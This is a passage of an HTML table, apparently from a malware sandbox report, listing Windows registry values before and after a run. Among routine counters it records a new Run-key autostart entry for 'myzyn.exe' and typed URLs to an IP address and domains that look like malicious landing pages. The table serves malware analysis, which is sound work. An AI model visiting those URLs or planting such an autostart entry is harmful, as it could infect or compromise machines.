<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:%pfvqy2%\Jverfunex.yax</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,06,00,00,00,a0,58,5d,5d,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,06,00,00,00,00,71,80,5d,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,21,00,3a,00,fb,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{6BF52A52-394A-11D3-B153-00C04F79FAA6}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,94,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,2a,00,c6,03,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1c,00,22,00,04,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000007</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,ab,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,50,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">LoadTime</span></td>
<td><span style="color: black; font-size: xx-small;">dword:0000000c</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000009</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections</span></td>
<td><span style="color: black; font-size: xx-small;">SavedLegacySettings</span></td>
<td><span style="color: black; font-size: xx-small;">hex:46,00,00,00,10,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:46,00,00,00,21,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,04,00,00,00,00,00,00,00,30,28,aa,1f,da,98,cd,01,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,02,00,00,00,0a,00,00,42,00,00,00,00,00,00,00,00,01,00,00,00,05,00,00,00,c0,78,18,00,d0,72,18,00,00,00,00,00,10,01,00,00,ff,ff,ff,ff,00,00,00,00,0c,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,03,a8,02,00,00,00,00,00,c0,00,00,00,00,00,00,46,40,9d,05,22,9e,7e,cf,11,ae,5a,00,aa,00,a7,11,2b,73,00,61,00,6e,00,64,00,62,00,6f,00,78,00,00,00,00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</span></td>
<td><span style="color: black; font-size: xx-small;">Orimdie</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached</span></td>
<td><span style="color: black; font-size: xx-small;">{2559A1F4-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,50,d3,6d,14,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,e0,c1,39,09,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached</span></td>
<td><span style="color: black; font-size: xx-small;">{2559A1F5-21D7-11D4-BDAF-00C04F60B9F0} {000214E6-0000-0000-C000-000000000046} 0x401</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,20,bf,84,14,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,34,00,38,00,00,f8,1e,0a,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU</span></td>
<td><span style="color: black; font-size: xx-small;">NodeSlots</span></td>
<td><span style="color: black; font-size: xx-small;">hex:02,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:02,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU</span></td>
<td><span style="color: black; font-size: xx-small;">MRUListEx</span></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,ff,ff,ff,ff,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,00,00,00,00,ff,ff,ff,ff,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU</span></td>
<td><span style="color: black; font-size: xx-small;">1</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:14,00,1f,48,ba,8f,0d,45,25,ad,d0,11,98,a8,08,00,36,1b,11,03,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1</span></td>
<td><span style="color: black; font-size: xx-small;">NodeSlot</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\BagMRU\1</span></td>
<td><span style="color: black; font-size: xx-small;">MRUListEx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:ff,ff,ff,ff,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\Bags\2\Shell</span></td>
<td><span style="color: black; font-size: xx-small;">FolderType</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"MyDocuments"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@explorer.exe,-7004</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Opens your Internet browser."</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url1</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.google.com/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://46.249.59.116/main.php?page=5a56c997ffff2f79"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url2</span></td>
<td><span style="color: black; font-size: xx-small;">"http://google.com/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.google.com/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url3</span></td>
<td><span style="color: black; font-size: xx-small;">"http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://ns8.ns360.info/main.php?page=f61d19dee2176c62"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url4</span></td>
<td><span style="color: black; font-size: xx-small;">"http://urlquery.net/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url5</span></td>
<td><span style="color: black; font-size: xx-small;">"http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://urlquery.net/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url6</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://google.com/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url7</span></td>
<td><span style="color: black; font-size: xx-small;">"http://oldversion.com/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url8</span></td>
<td><span style="color: black; font-size: xx-small;">"http://go.microsoft.com/fwlink/?LinkId=69157"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url9</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://oldversion.com/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url10</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://go.microsoft.com/fwlink/?LinkId=69157"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\DropDown</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Health</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{0890F930-4F80-4646-BAB1-4B6E5571FB89}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{1F32514F-1561-4922-A604-8A1F478B5A42}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{52903d79-f993-4de6-8317-20c9c176d823}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{59E7BF52-E5C9-4382-A39A-522DEE9AFDFD}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}</span></td>
<td><span style="color: black; font-size: xx-small;">AttemptedAutoRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{5F4BB5C9-4652-489B-8601-EEC0C3C32E2E}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{7F2B1D6B-1357-402C-A1C8-67E59583B41D}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{93075F62-16B3-43EC-A53B-FFAD0E01D5E7}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,0d,00,00,00,b0,f7,ed,18,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,11,00,00,00,00,91,ad,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5\VafgnyyEvgr.yax</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,60,0a,ac,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:%pfvqy2%\VafgnyyEvgr 2.5</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,b0,f7,ed,18,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,00,91,ad,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\Cebtenz Svyrf\Rcfvyba Fdhnerq\VafgnyyEvgr\VafgnyyEvgr.rkr</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,50,e8,07,19,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,90,71,d8,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:::{2559N1S4-21Q7-11Q4-OQNS-00P04S60O9S0}</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,07,00,00,00,b0,e4,6a,a6,dd,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,70,7b,f1,4e,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACVQY:%pfvqy2%\Jverfunex.yax</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,06,00,00,00,a0,58,5d,5d,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,06,00,00,00,00,71,80,5d,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
